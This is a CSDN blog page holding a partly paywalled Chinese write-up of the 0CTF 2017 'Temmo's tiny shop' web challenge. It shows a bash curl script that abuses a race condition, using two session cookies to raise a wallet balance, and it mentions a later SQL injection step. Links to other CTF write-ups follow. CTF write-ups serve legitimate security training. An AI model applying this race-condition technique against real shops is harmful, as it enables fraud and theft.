Writeup for 0CTF2017 web

最新推荐文章于 2025-05-06 18:12:32 发布

segOt

最新推荐文章于 2025-05-06 18:12:32 发布

阅读量1.9k

点赞数 1

CC 4.0 BY-SA版权

分类专栏： CTF 文章标签： 0CTF Writeup

本文链接：https://blog.youkuaiyun.com/segOt/article/details/66477728

本文详细介绍了2017年0CTF中Temmo’s tinyshop挑战的解题过程，包括利用race condition漏洞增加用户余额、通过SQL注入获取flag等关键步骤。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

- Temmos tiny shop

2017年0CTF，WEB部分题目的Writeup。

Temmo’s tiny shop

本题首先要获取!HINT!，但是初始钱包里只有4000，而HINT要价8000，此处使用条件竞争（race condition）这一漏洞来提升wallet的数值。利用两个浏览器登录同一账号，使用两个COOKIE来同时进行售卖的动作，则会进行两次售卖动作。bash代码如下

#!/bin/bash
cookie1="PHPSESSID=m19tgi4tq3eptm53pss14dc910"
cookie2="PHPSESSID=39083e7nft6kbvkjvph29socb0"

url="http://202.120.7.197/app.php"

curl "$url?action=buy&id=2" -b $cookie1
curl "$url?action=sale&id=2"

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

segOt

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ctf——writeup

Child_by_dream的博客

01-19

1160

cft线上赛——第四关地址：http://106.75.26.211:1111提示：DIV首先访问目标地址，他给了我一句话。不知道这是个啥，幌子。但并不阻碍我查看源代码。查看源代码，告诉我们一个文件。——index.php.txt。访问这个index.php.txt文件。有三个参数flag1，flag2，flag3，反对应三个值。然后我就想到把这三个参数通过get方式传进去，看看有没有反应。果然我

NJCTF 2017 web Writeup

Bendawang's Blog

03-13

9195

NJCTF 2017 web Writeup

参与评论您还未登录，请先登录后发表或查看评论

CTF writeup

08-10

CTF writeup masterCTF write ups from the vulnhub CTF team

0CTF-2017-web-writeup

dengzhasong7076的博客

03-20

284

xss搞的很爽... complicated xss 题目描述：The flag is in http://admin.government.vip:8000 两个xss点。 1、http://government.vip/ 存储型xss，未做过滤，管理员会触发此xss 202.120.7.205 - - [20/Mar/2017:14:26:18 +0800] "GET /aaakkk...

CTF夺旗赛：揭秘网络攻防技术战场，零基础入门到精通，收藏这一篇就够了

logic1001的博客

05-06

1575

（Capture The Flag）中文一般译作，在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF最早起源于1996年DEFCON全球黑客大会，需要参赛者在规定时间内，以“人-to-人”或“团队-to-团队”的形式，在一定的限制条件下，互相攻防、寻找漏洞、突破防线，从而争夺旗帜、获取分数，从而代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。CTF夺旗赛已经成为全球范围网络安全圈流行的竞赛形式，2013年全球举办了超过五十场国际性CTF赛事。

0CTF-2016-Web-piapiapia

feng的博客

11-07

324

知识点备份文件下载 PHP代码审计数组绕过preg_match 反序列化字符逃逸 WP 首先进入环境，查看源代码，发现了备份文件：然后下载下来，进行代码审计。审计完之后可以知道，flag是在config.php文件里，但是我们没法直接读取。唯一可以读取文件的就是profile.php里的这个： else { $profile = unserialize($profile); $phone = $profile['phone']; $email = $profile['email'];

BugkuCTF——最新web篇writeup（持续更新）

1匹黑马

11-16

4232

文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag：KEY{Web-2-bugKssNNikls9100} 计算器这里做了输入长度限制，F12选中输入框，修改长度限制即可。 flag：flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET，只要我们传递的参数为what，并且内容为flag，即可输出flag。 flag：flag{bugku_get_su8

个人CTF入门训练过程WriteUp

LastButNotLeast的博客

11-18

2054

(view-source:http://www.monyer.com/game/game1/) 查看网页源代码 → <a href="first.php"></a> ← php

bugkuctf web基础部分 writeup

river

03-20

3017

Bugku-ctf-web 管理员系统随便输入用户名和密码提示窗体顶端窗体底端 IP禁止访问，请联系本地管理员登陆，IP已被记录. 明显需要伪造允许登录的IP 知识点： XFF头(X-Forwarded-For)，代表客户端，也就是HTTP的请求端真实的IP。有两种方式可以从HTTP请求中获得请求者的IP地址。一个是从Remote Address中获得，另一个是从X-Forward-For中...

CTF-writeup

03-19

CTF-writeup

ctf_writeup:来自 Balsn 的 CTF 文章

08-03

Balsn CTF 报道 Balsn 是来自台湾的 CTF 团队，成立于 2016 年。我们积极参与 CTF 比赛，并发表有关挑战的文章。在我们的 GitHub 存储库中，这些文章采用 markdown + kaTeX 格式。有关更多信息，请参阅。目录 20200208-codegatectf2020quals 20191228-hxp36c3ctf 20191019-secconquals 20191012-hitconctfquals 20190928-pwnthybytesctf 20190928-bsidesdelhictf 20190921-dragonctfteaser 20190913-realworldctfqual 20190907-defcampctfqual 20190906-trendmicroctfqual 20190906-n1ct

CTF论坛练习平台密码学write up

dianzhao6995的博客

09-24

951

CTF论坛练习平台网址：http://123.206.31.85/challenges 1.滴答~滴摩尔斯密码解密直接得到flag bkctfmisc，注意格式输入即可 2.聪明的小羊栅栏解密，栅栏数2，解密得到 KEY{sad23jjdsa2} 3.ok 打开看到一串ook代码这是一种编程语言，百度ook在线解密可得 flag{ok-ctf...

CTF题目的write up

cjf____的博客

06-19

620

星星还是那颗星星哟月亮还是那个月亮山也还是那座山哟梁也还是那道梁碾子是碾子缸是缸哟爹是爹来娘是娘麻油灯呵还吱吱响点的还是那么丁点亮哦哦注意：得到的 flag 请包上 flag{} 提交felhaagv{ewtehtehfilnakgw}下面的字符串解密后便能获得flag：ZmxhZ3tUSEVfRkxBR19PRl9USElTX1NUUklOR30= 注意：得到的 flag 请包上 flag{} 提交。注意：得到的 flag 请包上 flag{} 提交。

CTF新生赛之Writeup

shikaku_的博客

11-27

6550

CTF新生赛之Writeup 作为零基础的新生，也是在开学后才了解了CTF，感觉本次新生赛中颇有收获，也是应赛制要求，故写下这份WP，以纪念本人的第一次CTF竞赛。回顾和感想 Misc 我也不知道为什么我要写这个，我就写了签到题哈哈哈哈哈过程是关注微信公众号SCUCTF，发送SCUx401CTF即可获得flag（不放图了） Web 因为是从Web入的门，所以先做的Web。这次新生赛做了六道题，都是非常简单的。因为看不懂PHP语言所以无法继续向前走了555， Crypto ...

世安杯CTF writeup

HBohan的博客

07-23

613

1 这都是基础 VkZad1dGSXdUbUZOZWs1T1YyeEdXVkl4Y0VWU01EVkxWbXhrV2xkVmVGVlVWa3BYVWpBd2VVMHdNVkJVYkVaWVUxWndWVlpGTVVkVk1HUk9WMVY0VlZSV1NsVlRSRWs1VUZRd1BRPT0= 一道base64+base64+base64+base32 即可解出 2 就是一个网页查看源代码发现有注释 <!—coding mac > 想到苹果系统的DS_Store 然后源代码发现img标签s

记一次CTF过程（Writeup）

最新发布

06-26

在CTF比赛中，日志分析是一项关键技能，尤其是在Web安全、取证（Forensics）和逆向工程类题目中。通过分析服务器日志、应用程序日志或网络流量日志，选手可以发现潜在的攻击路径、异常请求、上传文件记录、用户行为等重要信息。以下是一些常见方法和技术： ### 日志类型与获取方式 1. **Apache/Nginx访问日志** 在Web类题目中，常常会提供`access.log`或`error.log`文件供分析。这些日志记录了每次HTTP请求的时间、客户端IP、请求方法、URL路径、响应状态码、User-Agent等信息。例如： ``` 192.168.1.1 - - [07/Nov/2024:12:34:56 +0000] "GET /index.php HTTP/1.1" 200 "-" "Mozilla/5.0" ``` 这类日志可以通过工具如 `Apache Logs Viewer` 或直接使用命令行工具（如`grep`, `awk`, `cat`）进行分析[^2]。 2. **系统日志** Linux系统通常使用`/var/log/`目录下的日志文件，例如`auth.log`、`syslog`等，用于记录系统事件、登录尝试、服务运行状态等信息，对排查非法访问具有重要意义。 3. **应用日志** Web应用框架（如Django、Flask、Spring Boot）通常会有自定义的日志输出格式，可能包含调试信息、数据库操作、错误堆栈等，有助于理解程序执行流程。 --- ### 日志分析技巧 - **过滤特定关键词** 使用`grep`命令快速筛选出包含特定关键字的日志条目，例如查找所有上传请求： ```bash grep 'uploads' access.log ``` - **按状态码筛选请求** 查找返回200（成功）或404（未找到）的请求，可以帮助识别正常访问路径或隐藏资源： ```bash grep ' 200 ' access.log ``` - **提取IP地址与时间戳** 结合`awk`可以提取访问来源IP和时间信息，便于追踪可疑行为： ```bash awk '{print $1, $4}' access.log | sort | uniq -c ``` - **自动化脚本处理** 对于大规模日志数据，可以使用Python编写脚本来解析并分析日志内容。例如下面的代码片段可用来查找包含上传路径且状态为200的PHP或ASP请求记录[^4]： ```python with open('access.log', 'r') as file: lines = file.readlines() for line in lines: if "uploads" in line and "200" in line: if "php" in line or "asp" in line: print(line) ``` --- ### 常用工具推荐 - **ctflog** 由Virink开发的开源项目`ctflog`是一个专为CTF选手设计的比赛日志管理平台，支持记录比赛过程、解题思路、Writeup整理等功能，提升团队协作效率[^1]。 - **LogParser** Microsoft出品的日志分析工具，适用于结构化日志的查询与统计，尤其适合Windows环境下的IIS日志分析。 - **ELK Stack（Elasticsearch + Logstash + Kibana）** 虽然主要用于企业级日志分析，但在大型CTF比赛中也可用于集中管理和可视化日志数据。 --- ### 实战场景举例假设在一个CTF题目中，提示“seelog”，可以尝试在目标网站根路径后直接添加`/log`或`/logs`查看是否存在日志泄露问题。若存在`access.log`文件，下载后分析其中的访问记录，寻找可疑的上传行为或敏感路径访问痕迹，进而定位flag所在位置[^3]。 ---